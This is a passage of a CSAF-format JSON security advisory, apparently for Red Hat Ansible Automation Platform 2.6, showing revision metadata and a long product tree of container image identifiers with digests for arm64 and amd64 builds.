"revision_history": [
{
"date": "2026-03-31T23:31:56+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-31T23:31:59+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T10:45:24+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.6",
"product": {
"name": "Red Hat Ansible Automation Platform 2.6",
"product_id": "Red Hat Ansible Automation Platform 2.6",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.6::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Ansible Automation Platform"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9@sha256%3Aa414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774644659"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcp-server-rhel9@sha256%3A6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview\u0026tag=1774268173"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel9@sha256%3Ad26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774139204"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel9@sha256%3A97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774153089"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3A043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774585183"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3A20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774417022"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9@sha256%3A839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774363040"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9-operator@sha256%3Accf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484113"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcp-tools-rhel9@sha256%3A355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774268174"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9@sha256%3Aa490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774368903"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel9-operator@sha256%3A040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484033"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9@sha256%3Ae4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774258433"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel9-operator@sha256%3Af731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484073"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel9@sha256%3Ab8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484106"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9@sha256%3A098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774243862"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel9-operator@sha256%3Af0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484129"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel9@sha256%3A0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774139334"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel9-operator@sha256%3A0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484154"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel9@sha256%3Aa1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774647780"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel9@sha256%3Ac67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774487884"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel9@sha256%3A94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774490244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel9@sha256%3A86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774311517"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ee-supported-rhel9@sha256%3Ad6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774321273"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel9-operator@sha256%3Abc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774484549"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel9@sha256%3A07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774485790"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel9@sha256%3A96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c?arch=arm64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774573035"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-operator-bundle@sha256%3Af27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform\u0026tag=1774648925"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/mcp-server-rhel9@sha256%3A2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-tech-preview\u0026tag=1774268173"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/aap-must-gather-rhel9@sha256%3A224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774139204"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"product_identification_helper": {
"purl": "pkg:oci/platform-operator-bundle@sha256%3A79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform\u0026tag=1774648896"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-builder-rhel9@sha256%3Adb8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774153089"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ansible-dev-tools-rhel9@sha256%3A417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774585183"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-chatbot-rhel9@sha256%3Ad17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774417022"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"product_id": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"product_identification_helper": {
"purl": "pkg:oci/lightspeed-rhel9@sha256%3Ab348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76?arch=amd64\u0026repository_url=registry.redhat.io/ansible-automation-platform-26\u0026tag=1774363040"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"product": {
